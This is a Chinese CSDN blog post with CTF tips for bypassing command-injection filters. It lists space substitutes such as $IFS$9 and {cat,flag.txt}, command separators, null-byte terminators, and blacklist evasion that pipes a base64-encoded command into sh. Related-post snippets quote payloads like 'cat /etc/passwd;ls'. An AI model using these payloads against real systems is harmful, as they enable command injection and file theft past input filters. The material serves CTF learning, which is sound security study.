CTF命令执行与绕过

最新推荐文章于 2024-06-03 10:50:52 发布
最新推荐文章于 2024-06-03 10:50:52 发布
阅读量1.4k 收藏 6
点赞数 1
分类专栏: CTF 文章标签: hacks shell linux bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24399949/article/details/115610784
版权

浅谈CTF中命令执行与绕过的小技巧

一、空格绕过
1.cat<filename shell
2.cat<>filename shell
3.{cat,flag.txt} shell
4.%09 符号 php
5.cat$IFS$9filename cat${IFS}filename shell
6.a=$'\x20flag.txt'&&cat$a shell 注:\x20为空格符
二、命令分隔符号
1.ls /;cat filename shell
2.ls /&cat filename shell
3.ls /|cat filename shell
4.%0a php
5.%0d php
三、命令终止符
1.%00 %20 php
四、黑名单绕过
1.a=l;b=s;$a$b shell
2.echo R0g=|base64 -d shell

看情况联合使用

`echo$IFS$echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh|$IFS$9base64$IFS$9-d`

echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh

`head$IFS$9/fla?$IFS$9>1.txt`
R0g
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF工具-破空_flag查找工具3.3
02-17
用于在CTF签到题中,在文件夹及文件中,快速搜索flag及经过编码的flag字符串
CTF命令执行常见绕过
qq_42383069的博客
04-18 5135
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
CTF中的命令执行绕过方式
最新发布
2401_84466223的博客
06-03 729
cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令执行。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个'&'实现这个目的。
CTF 代码审计之绕过过滤的空白字符
天泽岁月
08-31 917
ctf空白字符
CTFWeb-命令执行漏洞过滤的绕过姿势
热门推荐
道阻且长,行则将至。
04-29 1万+
文章目录前言CTF题目绕过姿势命令联合执行关键词的绕过内联执行绕过多种解法变量拼接内联执行Base64编码总结 前言 为了备战(划水)5 月份广东省的 “红帽杯” 网络安全竞赛,继续开始到 BUUCTF 平台练习 CTF 题目。在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值: 本文目的在于结合 BU
CTFhub-sql注入-绕过空格过滤
ssss39的博客
08-19 401
如果1/**/union/**/select/**/1=1的显示结果与1/**/union/**/select/**/1=2的显示结果不一样,1/**/union/**/select/**/1,2 没有将数据带出来。3 没有回显,说明只用 1,2 这两个。与1的结果一样说明存在注入点。字段名dzkctujmta。
ctf题库 CTF理论考核题及答案
07-05
4. **文件上传漏洞的绕过方法**:A、B、D选项描述了常见的文件上传漏洞绕过技术。content-Type检测可以通过修改数据包中的content-Type字段绕过,而00截断利用的是文件系统在遇到00时停止读取的特点。 5. **Linux...
CTF Web各种题目的解题姿势
07-27
课时2:SSRF限制绕过策略13'07 课时3:SSRF中可以使用的协议分析17'44 课时4:Linux基础知识21'37 课时5:Redis未授权访问漏洞利用与防御16'17 课时6:Redis未授权添加ssh密钥f17'04 第5章 第五章 课时1:XXE-...
CTF PWN 武器库题
12-12
6. **ROP(Return-Oriented Programming)**:如果ASLR(地址空间布局随机化)等防御机制开启,可能需要利用ROP技术来绕过这些防护,找到合适的gadgets来构造控制流。 7. **调试技巧**:使用GDB等调试工具,分析...
php中函数禁用绕过的原理与利用1
08-03
值得注意的是,某些不受`open_basedir`影响的函数,如命令执行函数`system`,可以用来绕过限制。我们还可以寻找替代函数,例如使用反引号(`)来执行命令,以达到类似`system`的效果。 在研究如何绕过`disable_...
CTF6靶机实战.zip
05-25
参赛者需要了解文件上传漏洞的原理,如MIME类型检查绕过、目录遍历等,并学习如何构造有效载荷来触发这个反弹shell。 "8478.sh"文件可能包含了一个针对特定系统版本的漏洞利用脚本,数字8478可能是CVE编号或者是...
CTFHub笔记之技能树 WEB:过滤空格
weixin_48799157的博客
03-21 2271
小白一个,如果错误请指正! 首先我们常规的去注入一下,发现之前使用的句子行不通,原因是空格键被过滤掉了。 那我们就得去学习一下怎么绕过空格过滤: SQL注入绕过技巧 - VVVinson - 博客园1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方https://www.cnblogs.com/Vinson404/p...
CTF萌新日记——绕过
qq_45427131的博客
07-19 999
CTF萌新日记——绕过
几道webCTF——命令绕过
辰星的博客
03-14 1207
第一题无回显类型 这里的exec函数会把参数cmd的值当做命令执行,并且没有任何过滤和限制。 对于这种无回显的题目,我们可以选择重定向符>来查看和获取信息。 我们先使用cmd=ls>info然后查看info来获取当前路径下的文件信息,如下: 发现flag.php,我们再次使用重定向符把其内容写入一个文件,再读取这个文件即可,即使用cmd=cat fl*>info,再次前往页面查...
[CTF技巧]命令注入绕过总结
3tefanie丶zhou的博客
07-08 3479
命令分隔符 cat /etc/passwd;ls 分号 ; cmd1;cmd2(多条语句顺序执行) cat /etc/passwd && ls and && cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cat etc || ls or || cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2 管道符 | | 管道符 管道符”|“
[GXYCTF2019]Ping Ping Ping - RCE(空格、关键字绕过[3种方式])
oZuoShen123的博客
10-11 618
/?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); die("fxck your symbol!"); } else if(preg_match("/ /", $ip)){ die("fxck your space!"); } else
20210221CTF小记之bugkuCTF冬至红包(短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制)
qq_45290991的博客
02-22 2171
今天做了一道很恶心的题目,话不多说,先上结果图: 我们先来分析代码: 当没有用GET方法传入flag时,会显示Click here的链接。 点击链接会用GET方法传入一串字符串$exam,后面是当前时间的一串sha1哈希值。 判断传入的flag长度与$exam是否相同,不同则显示 长度不允许 第二个判断过滤了一大堆 第三个判断传入flag的值等于flag值的哈希值,正确就输出flag。用的是严格的三个等号的比较,我们flag都不知道,哈希值更不可能知道了,== 但容易发现此处存在任意代码.
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值